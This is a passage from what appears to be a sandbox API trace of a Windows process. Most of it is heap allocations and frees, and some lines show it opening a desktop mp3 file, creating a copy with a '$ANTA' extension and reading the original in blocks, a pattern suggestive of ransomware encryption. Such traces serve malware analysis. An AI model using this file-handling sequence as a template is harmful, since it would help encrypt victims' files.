cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0123.862] CryptDestroyHash (hHash=0x41ac640) returned 1 [0123.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0123.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0123.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0123.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0123.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0123.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0123.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0123.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0123.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0123.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0123.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0123.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0123.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0123.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0123.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0123.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0123.863] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0123.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0123.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0123.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0123.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0123.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0123.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0123.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0123.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0123.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0123.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0123.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0123.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0123.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0123.866] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0123.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0123.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0123.866] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0123.866] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0123.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0123.866] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kLTeW7.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\kltew7.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0123.867] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.867] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0123.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0123.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0123.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0123.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0123.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0123.867] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0123.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0123.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0123.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0123.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0123.867] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0123.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0123.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0123.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0123.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0123.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0123.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0123.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0123.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0123.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0123.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0123.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0123.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0123.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0123.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0123.868] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0123.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0123.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0123.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392500 | out: hHeap=0x1780000) returned 1 [0123.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0123.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0123.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0123.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0123.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0123.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0123.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0123.868] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kLTeW7.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\kltew7.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0123.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0123.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0123.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0123.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0123.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0123.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0123.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0123.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0123.869] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0123.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0123.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0123.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0123.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0123.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0123.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0123.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0123.869] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0123.869] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0123.870] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0123.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0123.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0123.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0123.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0123.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0123.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0123.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0123.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0123.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0123.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0123.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0123.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0123.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0123.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0123.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e06020 [0123.873] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0123.873] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0123.876] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x8980, 